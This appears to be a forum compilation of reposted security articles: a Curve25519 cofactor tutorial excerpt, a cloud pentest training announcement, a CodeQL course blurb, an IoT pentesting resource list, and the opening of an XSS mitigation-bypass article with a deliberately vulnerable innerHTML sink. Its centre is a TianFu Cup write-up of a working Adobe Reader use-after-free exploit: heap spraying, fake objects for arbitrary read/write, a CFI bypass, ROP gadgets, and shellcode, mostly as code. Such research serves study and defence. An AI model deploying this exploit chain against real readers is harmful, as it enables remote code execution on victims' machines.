Just clamp salt, and we again have a multiple of 8, and S is guaranteed to be on the prime-order subgroup. Of course, Alice might receive some malicious S instead, so she can't assume it's the correct one. And this time, X25519 does not have us covered:

Blind_salt = S . (1/r)

See, X25519 clamping has a problem: while it clears the cofactor all right, it does not preserve the main factor. Which means clamping neither survives nor preserves algebraic transformations. Inverting r then clamping does not work. Clamping then inverting r does not clear the cofactor. The solution is torsion safe representatives:

c = clamp(r)
i = 1/c   -- modulo L
s = i × t -- t%L == 1 and t%8 == 0

Where L is the prime order of the curve. For Curve25519, t = 3×L + 1. The performance trick explained in the torsion safe representatives section applies as expected. (Note: you can look at actual code in the implementation of the crypto_x25519_inverse() function in Monocypher.)

Conclusion

Phew, done. I confess I didn't think I'd need such a long post. But you get the idea: properly dealing with a cofactor these days is delicate. It's doable, but the cleaner solution these days is to use the Ristretto Group: you get modern curves and a prime order group.

(Discuss on Hacker News, Reddit, Lobsters)

Sursa: http://loup-vaillant.fr/tutorials/cofactor
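The torsion-safe inversion described in the article can be modelled in the [0..43] toy group, with H = 4 standing in for Curve25519's cofactor 8 and t = 12 playing the role of 3×L + 1. This is my own sketch, not Monocypher's code (note that `pow(c, -1, L)` needs Python 3.8+, and the toy clamp assumes the clamped scalar is nonzero modulo L):

```python
M, L, H = 44, 11, 4      # toy group order = prime L times cofactor H

def clamp(r):
    """Toy clamping: force a multiple of the cofactor H."""
    return (r - r % H) % M

def invert_clamped(r):
    """Torsion-safe inverse of clamp(r): undoes the multiplication on
    the prime-order subgroup while still clearing the cofactor."""
    c = clamp(r)
    i = pow(c, -1, L)        # 1/c modulo the prime order
    t = 12                   # t % L == 1 and t % H == 0
    return (i * t) % M

P = 8                        # "hidden base point" in the prime-order subgroup
r = 7
R = (P * clamp(r)) % M
# Multiplying by the torsion-safe inverse recovers P...
assert (R * invert_clamped(r)) % M == P
# ...even if an attacker slipped in a low-order component:
assert ((R + 11) * invert_clamped(r)) % M == P
```

Using 1/c modulo L alone would undo the blinding but leave any low-order component intact; multiplying by t folds in the "look left" projection at no extra cost.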
  2. Breaking and Pwning Apps and Servers on AWS and Azure - Free Training Courseware and Labs

Introduction

The world is changing right in front of our eyes. The way we have been learning is going to be radically transformed by the time we all have eradicated COVID19 from our lives. While we figure out the best way to transfer our knowledge to you, we realise that by the time the world is out of the lockdown, a cloud focussed pentesting training is likely going to be obsolete in parts. So as a contribution towards the greater security community, we decided to open source the complete training. Hope you enjoy this release and come back to us with questions, comments, feedback, new ideas or anything else that you want to let us know! Looking forward to hacking with all of you!

Description

Amazon Web Services (AWS) and Azure run the most popular and widely used cloud infrastructure and services. There is a need for security testers, cloud/IT admins and people tasked with the role of DevSecOps to learn how to effectively attack and test their cloud infrastructure. In this tools and techniques based training we cover attack approaches, creating your attack arsenal in the cloud, and a distilled deep dive into AWS and Azure services and concepts that should be used for security.

The training covers a multitude of scenarios taken from our vulnerability assessment, penetration testing and OSINT engagements, which take the student through the journey of discovery, identification and exploitation of security weaknesses, misconfigurations and poor programming practices that can lead to complete compromise of the cloud infrastructure. The training is meant to be hands-on, with guided walkthroughs, scenario based attacks, and coverage of tools that can be used for attacking and auditing. Due to the attack-focused nature of the training, there is not a lot of documentation around security architecture, defence in depth etc.
Additional references are provided in case further reading is required. To proceed, you will need An AWS account, activated for payments (you should be able to open and view the Services > EC2 page) An Azure account, you should be able to login to the Azure console About this repo This repo contains all the material from our 3 day hands on training that we have delivered at security conferences and to our numerous clients. The primary things in this repo are: documentation - all documentation in markdown format that is to be used to go through the training setup-files - files required to create a student virtual machine that will be used to create the cloud labs extras - any additional files that are relevant during the training Getting started Clone this repo Setup the student VM Host the documentation locally using gitbook Follow the docs Step 1 - Setup the student VM The documentation to set up your own student virtual machine, which is required for the training, is under documentation/setting-up/setup-student-virtual-machine.md. This needs to be done first. Step 2 - Documentation As all documentation is in markdown format, you can use Gitbook to host a local copy while walking through the training. Steps to do this: install gitbook-cli (npm install gitbook-cli -g) cd into the documentation folder gitbook serve browse to http://localhost:4000 License Documentation and Gitbook content are released under the Creative Commons Attribution Share Alike 4.0 International license. Lab material, including any code and scripts, is released under the MIT License. Sursa: https://github.com/appsecco/breaking-and-pwning-apps-and-servers-aws-azure-training
3. TianFu Cup 2019: Adobe Reader Exploitation Apr 10, 2020 Phan Thanh Duy Last year, I participated in the TianFu Cup competition in Chengdu, China. The chosen target was Adobe Reader. This post will detail a use-after-free bug of JSObject. My exploit is not clean and not an optimal solution. I finished this exploit through lots of trial and error. It involves lots of heap shaping code which I no longer remember exactly why it is there. I would highly suggest that you read the full exploit code and do the debugging yourself if necessary. This blog post was written based on a Windows 10 host with Adobe Reader. Vulnerability The vulnerability is located in the EScript.api component, which is the binding layer for various JS API calls. First I create an array of Sound objects.

SOUND_SZ = 512
SOUNDS = Array(SOUND_SZ)
for(var i=0; i<512; i++) {
    SOUNDS[i] = this.getSound(i)
    SOUNDS[i].toString()
}

This is what a Sound object looks like in memory. The 2nd dword is a pointer to a JSObject which has elements, slots, shape, fields, etc. The 4th dword is a string indicating the object's type. I'm not sure which version of Spidermonkey Adobe Reader is using. At first I thought this was a NativeObject but its fields don't seem to match Spidermonkey's source code. If you know what this structure is or have a question, please contact me via Twitter.

0:000> dd @eax
088445d8 08479bb0 0c8299e8 00000000 085d41f0
088445e8 0e262b80 0e262f38 00000000 00000000
088445f8 0e2630d0 00000000 00000000 00000000
08844608 00000000 5b8c4400 6d6f4400 00000000
08844618 00000000 00000000
0:000> !heap -p -a @eax
address 088445d8 found in _HEAP @ 4f60000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
088445d0 000a 0000 [00] 088445d8 00048 - (busy)
0:000> da 085d41f0
085d41f0 "Sound"

This 0x48 memory region and its fields are what is going to be freed and reused.
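The layout described above can be checked mechanically. In this sketch, the field meanings come from the article's description (2nd dword = JSObject pointer, 4th dword = pointer to the "Sound" type string); the function and key names are mine.

```python
# Sketch: pulling the two interesting fields out of the Sound object dump above.
import struct

def parse_sound(raw):
    """raw: the first 16 bytes of the 0x48-byte Sound object allocation."""
    dwords = struct.unpack("<4I", raw[:16])
    return {"jsobject": dwords[1],       # 2nd dword: pointer to the JSObject
            "type_str_ptr": dwords[3]}   # 4th dword: pointer to the type string

# first four dwords from the windbg dump at 088445d8
raw = struct.pack("<4I", 0x08479BB0, 0x0C8299E8, 0x00000000, 0x085D41F0)
info = parse_sound(raw)
assert info["jsobject"] == 0x0C8299E8      # the JSObject this post targets
assert info["type_str_ptr"] == 0x085D41F0  # points at the string "Sound"
```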
Since AdobeReader.exe is a 32-bit binary, I can heap spray and know exactly where my controlled data is in memory, then overwrite this whole memory region with controlled data and try to find a way to control PC. I failed because I don't really know what all these fields are. I don't have a memory leak. Adobe has CFI. So I turned my attention to the JSObject (2nd dword) instead. Also, being able to fake a JSObject is a very powerful primitive. Unfortunately the 2nd dword is not on the heap. It is in a memory region which is VirtualAlloced when Adobe Reader starts. One important point to notice is that memory contents are not cleared after they are freed.

0:000> !address 0c8299e8
Mapping file section regions...
Mapping module regions...
Mapping PEB regions...
Mapping TEB and stack regions...
Mapping heap regions...
Mapping page heap regions...
Mapping other regions...
Mapping stack trace database regions...
Mapping activation context regions...
Usage: <unknown>
Base Address: 0c800000
End Address: 0c900000
Region Size: 00100000 ( 1.000 MB)
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
Allocation Base: 0c800000
Allocation Protect: 00000004 PAGE_READWRITE
Content source: 1 (target), length: d6618

I realized that ESObjectCreateArrayFromESVals and ESObjectCreate also allocate into this area. I used the currentValueIndices function to call ESObjectCreateArrayFromESVals:

/* prepare array elements buffer */
f = this.addField("f" , "listbox", 0, [0,0,0,0]);
t = Array(32)
for(var i=0; i<32; i++) t[i] = i
f.multipleSelection = 1
f.setItems(t)
f.currentValueIndices = t
// every time currentValueIndices is accessed `ESObjectCreateArrayFromESVals` is called to create a new array.
for(var j=0; j<THRESHOLD_SZ; j++) f.currentValueIndices

Looking at the ESObjectCreateArrayFromESVals return value, we can see that our JSObject 0d2ad1f0 is not on the heap but its elements buffer at 08c621e8 is.
The ffffff81 is the tag for numbers, just as ffffff85 is for strings and ffffff87 for objects.

0:000> dd @eax
0da91b00 088dfd50 0d2ad1f0 00000001 00000000
0da91b10 00000000 00000000 00000000 00000000
0da91b20 00000000 00000000 00000000 00000000
0da91b30 00000000 00000000 00000000 00000000
0da91b40 00000000 00000000 5b9868c6 88018800
0da91b50 0dbd61d8 537d56f8 00000014 0dbeb41c
0da91b60 0dbd61d8 00000030 089dfbdc 00000001
0da91b70 00000000 00000003 00000000 00000003
0:000> !heap -p -a 0da91b00
address 0da91b00 found in _HEAP @ 5570000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
0da91af8 000a 0000 [00] 0da91b00 00048 - (busy)
0:000> dd 0d2ad1f0
0d2ad1f0 0d2883e8 0d225ac0 00000000 08c621e8
0d2ad200 0da91b00 00000000 00000000 00000000
0d2ad210 00000000 00000020 0d227130 0d2250c0
0d2ad220 00000000 553124f8 0da8dfa0 00000000
0d2ad230 00c10003 0d27d180 0d237258 00000000
0d2ad240 0d227130 0d2250c0 00000000 553124f8
0d2ad250 0da8dcd0 00000000 00c10001 0d27d200
0d2ad260 0d237258 00000000 0d227130 0d2250c0
0:000> dd 08c621e8
08c621e8 00000000 ffffff81 00000001 ffffff81
08c621f8 00000002 ffffff81 00000003 ffffff81
08c62208 00000004 ffffff81 00000005 ffffff81
08c62218 00000006 ffffff81 00000007 ffffff81
08c62228 00000008 ffffff81 00000009 ffffff81
08c62238 0000000a ffffff81 0000000b ffffff81
08c62248 0000000c ffffff81 0000000d ffffff81
08c62258 0000000e ffffff81 0000000f ffffff81
0:000> !heap -p -a 08c621e8
address 08c621e8 found in _HEAP @ 5570000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
08c621d0 0023 0000 [00] 08c621d8 00110 - (busy)

So our goal now is to overwrite this elements buffer
to inject a fake Javascript object. This is my plan at this point:

1. Free Sound objects.
2. Try to allocate dense arrays into the freed Sound objects' location using currentValueIndices.
3. Free the dense arrays.
4. Try to allocate into the freed elements buffers.
5. Inject a fake Javascript object.

The code below iterates through the SOUNDS array to free its elements and uses currentValueIndices to reclaim them:

/* free and reclaim sound object */
RECLAIM_SZ = 512
RECLAIMS = Array(RECLAIM_SZ)
THRESHOLD_SZ = 1024*6
NTRY = 3
NOBJ = 8 //18
for(var i=0; i<NOBJ; i++) {
    SOUNDS[i] = null //free one sound object
    gc()
    for(var j=0; j<THRESHOLD_SZ; j++) f.currentValueIndices
    try {
        //if the reclaim succeeds `this.getSound` returns an array instead and its first element should be 0
        if (this.getSound(i)[0] == 0) {
            RECLAIMS[i] = this.getSound(i)
        } else {
            console.println('RECLAIM SOUND OBJECT FAILED: '+i)
            throw ''
        }
    } catch (err) {
        console.println('RECLAIM SOUND OBJECT FAILED: '+i)
        throw ''
    }
    gc()
}
console.println('RECLAIM SOUND OBJECT SUCCEED')

Next, we will free all the dense arrays and try to allocate back into their elements buffers using TypedArray. I put fake integers (0x33441122) at the start of the array to check if the reclaim succeeded.
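As an aside, the tag/payload encoding visible in the element-buffer dumps (0xffffff81 for numbers, 0xffffff85 for strings, 0xffffff87 for objects) can be decoded with a small sketch. The tag names are inferred from the article; the helper is mine.

```python
# Sketch: decoding the 8-byte tagged values seen in the element-buffer dumps.
import struct

TAGS = {0xffffff81: "number", 0xffffff85: "string", 0xffffff87: "object"}

def decode_jsvals(buf):
    """Return (tag_name, payload) pairs from a raw 32-bit element buffer."""
    vals = []
    for off in range(0, len(buf), 8):
        payload, tag = struct.unpack_from("<II", buf, off)  # little-endian dwords
        vals.append((TAGS.get(tag, "unknown"), payload))
    return vals

# first 16 bytes of the dump at 08c621e8: elements 0 and 1, both numbers
dump = struct.pack("<4I", 0x0, 0xffffff81, 0x1, 0xffffff81)
print(decode_jsvals(dump))  # [('number', 0), ('number', 1)]
```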
The corrupted array with our controlled elements buffer is then put into variable T:

/* free all allocated array objects */
this.removeField("f")
RECLAIMS = null
f = null
FENCES = null //free fence
gc()
for (var j=0; j<8; j++) SOUNDS[j] = this.getSound(j)

/* reclaim freed element buffer */
for(var i=0; i<FREE_110_SZ; i++) {
    FREES_110[i] = new Uint32Array(64)
    FREES_110[i][0] = 0x33441122
    FREES_110[i][1] = 0xffffff81
}
T = null
for(var j=0; j<8; j++) {
    try {
        // if the reclaim succeeds the first element will be our injected number
        if (SOUNDS[j][0] == 0x33441122) {
            T = SOUNDS[j]
            break
        }
    } catch (err) {}
}
if (T==null) {
    console.println('RECLAIM element buffer FAILED')
    throw ''
} else console.println('RECLAIM element buffer SUCCEED')

From this point, we can put fake Javascript objects into our elements buffer and leak the address of objects assigned to it. The following code is used to find out which TypedArray is our fake elements buffer and leak its address.

/* create and leak the address of an array buffer */
WRITE_ARRAY = new Uint32Array(8)
T[0] = WRITE_ARRAY
T[1] = 0x11556611
for(var i=0; i<FREE_110_SZ; i++) {
    if (FREES_110[i][0] != 0x33441122) {
        FAKE_ELES = FREES_110[i]
        WRITE_ARRAY_ADDR = FREES_110[i][0]
        console.println('WRITE_ARRAY_ADDR: ' + WRITE_ARRAY_ADDR.toString(16))
        assert(WRITE_ARRAY_ADDR>0)
        break
    } else {
        FREES_110[i] = null
    }
}

Arbitrary Read/Write Primitives To achieve an arbitrary read primitive I spray a bunch of fake string objects into the heap, then assign them into our elements buffer.
GUESS = 0x20000058 //0x20d00058

/* spray fake strings */
for(var i=0x1100; i<0x1400; i++) {
    var dv = new DataView(SPRAY[i])
    dv.setUint32(0, 0x102, true) //string header
    dv.setUint32(4, GUESS+12, true) //string buffer, point here to leak back idx 0x20000064
    dv.setUint32(8, 0x1f, true) //string length
    dv.setUint32(12, i, true) //index into SPRAY that is at 0x20000058
    delete dv
}
gc()
//app.alert("Create fake string done")

/* point one of our elements to the fake string */
FAKE_ELES[4] = GUESS
FAKE_ELES[5] = 0xffffff85

/* create aar primitive */
SPRAY_IDX = s2h(T[2])
console.println('SPRAY_IDX: ' + SPRAY_IDX.toString(16))
assert(SPRAY_IDX>=0)
DV = new DataView(SPRAY[SPRAY_IDX])
function myread(addr) {
    //change fake string object's buffer to the address we want to read.
    DV.setUint32(4, addr, true)
    return s2h(T[2])
}

Similarly, to achieve arbitrary write, I create a fake TypedArray. I simply copy the WRITE_ARRAY contents and change its SharedArrayRawBuffer pointer.

/* create aaw primitive */
for(var i=0; i<32; i++) {DV.setUint32(i*4+16, myread(WRITE_ARRAY_ADDR+i*4), true)} //copy WRITE_ARRAY
FAKE_ELES[6] = GUESS+0x10
FAKE_ELES[7] = 0xffffff87
function mywrite(addr, val) {
    DV.setUint32(96, addr, true)
    T[3][0] = val
}
//mywrite(0x200000C8, 0x1337)

Gaining Code Execution With arbitrary read/write primitives, I can leak the base address of EScript.API from the TypedArray object's header. Inside EScript.API there is a very convenient gadget to call VirtualAlloc.
We can safely assume that these CTextField objects will lie behind our MARK_ADDR. Finally I walk the heap to look for CTextField::vftable. /* leak .rdata:007A55BC ; const CTextField::`vftable' */ //f9c59c6cf718d1458b4af7bbada75243 for(var i=0; i<32; i++) this.addField(i, "text", 0, [0,0,0,0]); T[4] = STR_60.toLowerCase() for(var i=32; i<64; i++) this.addField(i, "text", 0, [0,0,0,0]); MARK_ADDR = myread(FAKE_ELES[8]+4) console.println('MARK_ADDR: '+ MARK_ADDR.toString(16)) assert(MARK_ADDR>0) vftable = 0 while (1) { MARK_ADDR += 4 vftable = myread(MARK_ADDR) if ( ((vftable&0xFFFF)==0x55BC) && (((myread(MARK_ADDR+8)&0xff00ffff)>>>0)==0xc0000000)) break } console.println('MARK_ADDR: '+ MARK_ADDR.toString(16)) assert(MARK_ADDR>0) /* leak acroform, icucnv58 base address */ ACROFORM_BASE = vftable-0x07A55BC console.println('ACROFORM_BASE: ' + ACROFORM_BASE.toString(16)) assert(ACROFORM_BASE>0) We can then overwrite CTextField object’s vftable to control PC. Bypassing CFI With CFI enabled, we cannot use ROP. I wrote a small script to look for any module that doesn’t have CFI enabled and is loaded at the time my exploit is running. I found icucnv58.dll. import pefile import os for root, subdirs, files in os.walk(r'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader'): for file in files: if file.endswith('.dll') or file.endswith('.exe') or file.endswith('.api'): fpath = os.path.join(root, file) try: pe = pefile.PE(fpath, fast_load=1) except Exception as e: print (e) print ('error', file) if (pe.OPTIONAL_HEADER.DllCharacteristics & 0x4000) == 0: print (file) The icucnv58.dll base address can be leaked via Acroform.API. There is enough gadgets inside icucnv58.dll to perform a stack pivot and ROP. 
//a86f5089230164fb6359374e70fe1739 - md5sum of `icucnv58.dll`
r = myread(ACROFORM_BASE+0xBF2E2C)
ICU_BASE = myread(r+16)
console.println('ICU_BASE: ' + ICU_BASE.toString(16))
assert(ICU_BASE>0)
g1 = ICU_BASE + 0x919d4 + 0x1000 //mov esp, ebx ; pop ebx ; ret
g2 = ICU_BASE + 0x73e44 + 0x1000 //in al, 0 ; add byte ptr [eax], al ; add esp, 0x10 ; ret
g3 = ICU_BASE + 0x37e50 + 0x1000 //pop esp;ret

Last Step Finally, we have everything we need to achieve full code execution. Write the shellcode into memory using the arbitrary write primitive, then call VirtualProtect to enable execute permission. The full exploit code can be found here if you are interested. My UAF exploit achieves a ~80% success rate. The exploitation takes about 3-5 seconds on average. If multiple retries are required, the exploitation can take a bit more time.

/* copy CTextField vftable */
for(var i=0; i<32; i++) mywrite(GUESS+64+i*4, myread(vftable+i*4))
mywrite(GUESS+64+5*4, g1) //edit one pointer in vftable

/* 1st rop chain */
mywrite(MARK_ADDR+4, g3)
mywrite(MARK_ADDR+8, GUESS+0xbc)

/* 2nd rop chain */
rop = [
    myread(ESCRIPT_BASE + 0x01B0058), //VirtualProtect
    GUESS+0x120, //return address
    GUESS+0x120, //buffer
    0x1000, //sz
    0x40, //new protect
    GUESS-0x20 //old protect
]
for(var i=0; i<rop.length;i++) mywrite(GUESS+0xbc+4*i, rop[i])

//shellcode
shellcode = [835867240, 1667329123, 1415139921, 1686860336, 2339769483, 1980542347, 814448152, 2338274443, 1545566347, 1948196865, 4270543903, 605009708, 390218413, 2168194903, 1768834421, 4035671071, 469892611, 1018101719, 2425393296]
for(var i=0; i<shellcode.length; i++) mywrite(GUESS+0x120+i*4, re(shellcode[i]))

/* overwrite real vftable */
mywrite(MARK_ADDR, GUESS+64)

Finally, with that exploit, we can spawn our Calc. Sursa: https://starlabs.sg/blog/2020/04/tianfu-cup-2019-adobe-reader-exploitation/
4. CodeQL U-Boot Challenge (C/C++) The GitHub Training Team Learn to use CodeQL, a query language that helps find bugs in source code. Find 9 remote code execution vulnerabilities in the open-source project Das U-Boot, and join the growing community of security researchers using CodeQL. Quickly learn CodeQL, an expressive language for code analysis, which helps you explore source code to find bugs and vulnerabilities. During this beginner-level course, you will learn to write queries in CodeQL and find critical security vulnerabilities that were identified in Das U-Boot, a popular open-source project. What you'll learn Upon completion of the course, you'll be able to: Understand the basic syntax of CodeQL queries Use the standard CodeQL libraries to write queries and explore code written in C/C++ Use predicates and classes, the building blocks of CodeQL queries, to make your queries more expressive and reusable Use the CodeQL data flow and taint tracking libraries to write queries that find real security vulnerabilities What you'll build You will walk in the steps of our security researchers, and create: Several CodeQL queries that look for interesting patterns in C/C++ code. A CodeQL security query that finds 9 critical security vulnerabilities in the Das U-Boot codebase from 2019 (before it was patched!) and can be reused to audit other open-source projects of your choice. Pre-requisites Some knowledge of the C language and standard library. A basic knowledge of secure coding practices is useful to understand the context of this course, and all the consequences of the bugs we'll find, but is not mandatory to learn CodeQL. This is a beginner course. No prior knowledge of CodeQL is required. Audiences Security researchers Developers Sursa: https://lab.github.com/githubtraining/codeql-u-boot-challenge-(cc++)
5. IoT Pentesting 101 && IoT Security 101 Approach Methodology 1. Network 2. Web (Front & Backend and Web services) 3. Mobile App (Android & iOS) 4. Wireless Connectivity (Zigbee, WiFi, Bluetooth, etc) 5. Firmware Pentesting (OS of IoT Devices) 6. Hardware Hacking & Fault Injections & SCA Attacks 7. Storage Medium 8. I/O Ports To see hacked devices https://blog.exploitee.rs/2018/10/ https://www.exploitee.rs/ https://forum.exploitee.rs/ Your Lenovo Watch X Is Watching You & Sharing What It Learns Your Smart Scale is Leaking More than Your Weight: Privacy Issues in IoT Smart Bulb Offers Light, Color, Music, and… Data Exfiltration? Besder-IPCamera analysis Smart Lock Subaru Head Unit Jailbreak Jeep Hack Chat groups for IoT Security https://t.me/iotsecurity1011 https://www.reddit.com/r/IoTSecurity101/ https://t.me/hardwareHackingBrasil https://t.me/joinchat/JAMxOg5YzdkGjcF3HmNgQw https://discord.gg/EH9dxT9 Books For IoT Pentesting Android Hacker's Handbook Hacking the Xbox Car hacker's handbook IoT Penetration Testing Cookbook Abusing the Internet of Things Hardware Hacking: Have Fun while Voiding your Warranty Linksys WRT54G Ultimate Hacking Linux Binary Analysis Firmware Hardware Hacking Handbook inside radio attack and defense Blogs for iotpentest https://payatu.com/blog/ http://jcjc-dev.com/ https://w00tsec.blogspot.in/ http://www.devttys0.com/ https://www.rtl-sdr.com/ https://keenlab.tencent.com/en/ https://courk.cc/ https://iotsecuritywiki.com/ https://cybergibbons.com/ http://firmware.re/ https://iotmyway.wordpress.com/ http://blog.k3170makan.com/ https://blog.tclaverie.eu/ http://blog.besimaltinok.com/category/iot-pentest/ https://ctrlu.net/ http://iotpentest.com/ https://blog.attify.com https://duo.com/decipher/ http://www.sp3ctr3.me http://blog.0x42424242.in/ https://dantheiotman.com/ https://blog.danman.eu/ https://quentinkaiser.be/ https://blog.quarkslab.com https://blog.ice9.us/ https://labs.f-secure.com/ https://mg.lol/blog/ https://cjhackerz.net/
Awesome CheatSheets Hardware Hacking Nmap Search Engines for IoT Devices Shodan FOFA Censys Zoomeye ONYPHE CTF For IoT's And Embeddded https://github.com/hackgnar/ble_ctf https://www.microcorruption.com/ https://github.com/Riscure/Rhme-2016 https://github.com/Riscure/Rhme-2017 https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html https://github.com/scriptingxss/IoTGoat YouTube Channels for IoT Pentesting Liveoverflow Binary Adventure EEVBlog JackkTutorials Craig Smith iotpentest [Mr-IoT] Besim ALTINOK - IoT - Hardware - Wireless Ghidra Ninja Cyber Gibbons Vehicle Security Resources https://github.com/jaredthecoder/awesome-vehicle-security IoT security vulnerabilites checking guides Reflecting upon OWASP TOP-10 IoT Vulnerabilities OWASP IoT Top 10 2018 Mapping Project Firmware Pentest Guide Hardware toolkits for IoT security analysis IoT Gateway Software Webthings by Mozilla - RaspberryPi Labs for Practice IoT Goat IoT Pentesting OSes Sigint OS- LTE IMSI Catcher Instatn-gnuradio OS - For Radio Signals Testing AttifyOS - IoT Pentest OS - by Aditya Gupta Ubutnu Best Host Linux for IoT's - Use LTS Internet of Things - Penetration Testing OS Dragon OS - DEBIAN LINUX WITH PREINSTALLED OPEN SOURCE SDR SOFTWARE EmbedOS - Embedded security testing virtual machine Exploitation Tools Expliot - IoT Exploitation framework - by Aseemjakhar A Small, Scalable Open Source RTOS for IoT Embedded Devices Skywave Linux- Software Defined Radio for Global Online Listening Routersploit (Exploitation Framework for Embedded Devices) IoTSecFuzz (comprehensive testing for IoT device) Reverse Engineering Tools IDA Pro GDB Radare2 | cutter Ghidra Introduction Introduction to IoT IoT Architecture IoT attack surface IoT Protocols Overview MQTT Introduction Hacking the IoT with MQTT thoughts about using IoT MQTT for V2V and Connected Car from CES 2014 Nmap The Seven Best MQTT Client Tools A Guide to MQTT by Hacking a Doorbell to send Push Notifications Are smart homes vulnerable 
to hacking Softwares Mosquitto HiveMQ MQTT Explorer CoAP Introduction CoAP client Tools CoAP Pentest Tools Nmap Automobile CanBus Introduction and protocol Overview PENTESTING VEHICLES WITH CANTOOLZ Building a Car Hacking Development Workbench: Part1 CANToolz - Black-box CAN network analysis framework PLAYING WITH CAN BUS Radio IoT Protocols Overview Understanding Radio Signal Processing Software Defined Radio Gnuradio Creating a flow graph Analysing radio signals Recording specific radio signal Replay Attacks Base transceiver station (BTS) what is base tranceiver station How to Build Your Own Rogue GSM BTS GSM & SS7 Pentesting Introduction to GSM Security GSM Security 2 vulnerabilities in GSM security with USRP B200 Security Testing 4G (LTE) Networks Case Study of SS7/SIGTRAN Assessment Telecom Signaling Exploitation Framework - SS7, GTP, Diameter & SIP ss7MAPer – A SS7 pen testing toolkit Introduction to SIGTRAN and SIGTRAN Licensing SS7 Network Architecture Introduction to SS7 Signaling Breaking LTE on Layer Two Zigbee & Zwave Introduction and protocol Overview Hacking Zigbee Devices with Attify Zigbee Framework Hands-on with RZUSBstick ZigBee & Z-Wave Security Brief BLE Intro and SW & HW Tools Step By Step guide to BLE Understanding and Exploiting Traffic Engineering in a Bluetooth Piconet BLE Characteristics Reconnaissance (Active and Passive) with HCI Tools btproxy hcitool & bluez Testing With GATT Tool Cracking encryption bettercap BtleJuice Bluetooth Smart Man-in-the-Middle framework gattacker BTLEjack Bluetooth Low Energy Swiss army knife Hardware NRFCONNECT - 52840 EDIMAX CSR 4.0 ESP32 - Development and learning Bluetooth Ubertooth Sena 100 BLE Pentesting Tutorials Bluetooth vs BLE Basics Intel Edison as Bluetooth LE — Exploit box How I Reverse Engineered and Exploited a Smart Massager My journey towards Reverse Engineering a Smart Band — Bluetooth-LE RE Bluetooth Smartlocks I hacked MiBand 3 GATTacking Bluetooth Smart Devices Mobile security (Android & 
iOS) Android App Reverse Engineering 101 Android Application pentesting book Android Pentest Video Course-TutorialsPoint IOS Pentesting OWASP Mobile Security Testing Guide Android Tamer - Android Tamer is a Virtual / Live Platform for Android Security professionals Online Assemblers AZM Online Arm Assembler by Azeria Online Disassembler Compiler Explorer is an interactive online compiler which shows the assembly output of compiled C++, Rust, Go ARM Azeria Labs ARM EXPLOITATION FOR IoT Damn Vulnerable ARM Router (DVAR) EXPLOIT.EDUCATION Pentesting Firmwares and emulating and analyzing Firmware analysis and reversing Firmware emulation with QEMU Dumping Firmware using Buspirate Reversing ESP8266 Firmware Emulating Embedded Linux Devices with QEMU Emulating Embedded Linux Systems with QEMU Fuzzing Embedded Linux Devices Emulating ARM Router Firmware Reversing Firmware With Radare Samsung Firmware Magic Firmware samples to pentest Download From here IoT hardware Overview IoT Hardware Guide Hardware Gadgets to pentest Bus Pirate EEPROM reader/SOIC Cable Jtagulator/Jtagenum Logic Analyzer The Shikra FaceDancer21 (USB Emulator/USB Fuzzer) RfCat Hak5Gear- Hak5FieldKits Ultra-Mini Bluetooth CSR 4.0 USB Dongle Adapter Attify Badge - UART, JTAG, SPI, I2C (w/ headers) Attacking Hardware Interfaces Serial Terminal Basics Reverse Engineering Serial Ports REVERSE ENGINEERING ARCHITECTURE AND PINOUT OF CUSTOM ASICS UART Identifying UART interface onewire-over-uart Accessing sensor via UART Using UART to connect to a chinese IP cam A journey into IoT – Hardware hacking: UART JTAG Identifying JTAG interface NAND Glitching Attack\ SideChannel Attacks All Attacks Awesome IoT Pentesting Guides Shodan Pentesting Guide Car Hacking Practical Guide 101 OWASP Firmware Security Testing Methodology Vulnerable IoT and Hardware Applications IoT : https://github.com/Vulcainreo/DVID Safe : https://insinuator.net/2016/01/damn-vulnerable-safe/ Router : https://github.com/praetorian-code/DVRF SCADA 
: https://www.slideshare.net/phdays/damn-vulnerable-chemical-process PI : https://whitedome.com.au/re4son/sticky-fingers-dv-pi/ SS7 Network: https://www.blackhat.com/asia-17/arsenal.html#damn-vulnerable-ss7-network VoIP : https://www.vulnhub.com/entry/hacklab-vulnvoip,40/ follow the people Jilles Aseem Jakhar Cybergibbons Ilya Shaposhnikov Mark C. A-a-ron Guzman Arun Mane Yashin Mehaboobe Arun Magesh Sursa: https://github.com/V33RU/IoTSecurity101
6. Bypassing modern XSS mitigations with code-reuse attacks Alexander Andersson 2020-04-03 Cyber Security Cross-site Scripting (XSS) has been around for almost two decades yet it is still one of the most common vulnerabilities on the web. Many second-line mechanisms have therefore evolved to mitigate the impact of the seemingly endless flow of new vulnerabilities. Quite often I meet the misconception that these second-line mechanisms can be relied upon as the single protection against XSS. Today we'll see why this is not the case. We'll explore a relatively new technique in the area named code-reuse attacks. Code-reuse attacks for the web were first described in 2017 and can be used to bypass most modern browser protections including: HTML sanitizers, WAFs/XSS filters, and most Content Security Policy (CSP) modes. Introduction Let's do a walkthrough using an example:

1 <?php
2 /* File: index.php */
3 // CSP disabled for now, will enable later
4 // header("Content-Security-Policy: script-src 'self' 'unsafe-eval'; object-src 'none';");
5 ?>
6
7 <!DOCTYPE html>
8 <html lang="en">
9 <body>
10 <div id="app">
11 </div>
12 <script src="http://127.0.0.1:8000/main.js"></script>
13 </body>
14 </html>

1 /** FILE: main.js **/
2 var ref=document.location.href.split("?injectme=")[1];
3 document.getElementById("app").innerHTML = decodeURIComponent(ref);

The app has a DOM-based XSS vulnerability. Main.js gets the value of the GET parameter "injectme" and inserts it into the DOM as raw HTML. This is a problem because the user can control the value of the parameter. The user can therefore manipulate the DOM at will. The request below is a proof of concept that proves that we can inject arbitrary JavaScript. Before sending the request we first start a local test environment on port 8000 (php -S 127.0.0.1 8000).
